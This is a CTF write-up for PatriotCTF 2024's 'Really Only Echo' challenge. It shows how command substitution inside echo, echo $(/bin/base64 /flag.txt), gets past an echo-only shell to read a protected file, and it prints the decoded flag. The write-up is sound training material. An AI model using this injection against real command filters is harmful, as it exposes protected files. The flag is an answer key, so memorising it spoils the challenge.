# PatriotCTF 2024 - Really Only Echo **Title:** Really Only Echo **Description:** Hey, I have made a terminal that only uses echo, can you find the flag? `nc chal.competitivecyber.club 3333` **Files:** [server.py](https://github.com/xtasy94/CTFW/blob/main/PatriotCTF%202024/ReallyOnlyEcho/Files/server.py) ## Solution: So, in this challenge we were given a terminal where we can only use the `echo` command, now the first step should be to locate where the flag might be, I start searching from the `root` directory: ```bash Please input command: echo /* /bin /boot /dev /etc /flag.txt /home /lib /lib64 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var ``` And there's the `flag.txt` file, Naturally, the next step is to attempt to read it using `echo`: ```bash Please input command: echo $(</flag.txt) ``` Unfortunately, this attempt to read the file fails. Since direct access to the file is blocked, I decide to explore `/bin`, which contains various executable programs. By listing the contents of `/bin`, I look for something that can help: ```bash Please input command: echo /bin/* /bin/[ /bin/base64 /bin/cat /bin/echo /bin/bash ... ``` I spot `/bin/base64`, a program that can encode or decode base64 strings. Using this tool, I attempt to base64-encode the contents of the flag: ```bash Please input command: echo $(/bin/base64 /flag.txt) cGN0ZntlY2hvX2lzX3N1Y2hfYV92ZXJzYXRpbGVfY29tbWFuZH0= ``` The output is a base64-encoded string. Decoding this string gives us the flag: ```bash $ echo "cGN0ZntlY2hvX2lzX3N1Y2hfYV92ZXJzYXRpbGVfY29tbWFuZH0=" | base64 -d pctf{echo_is_such_a_versatile_command} ```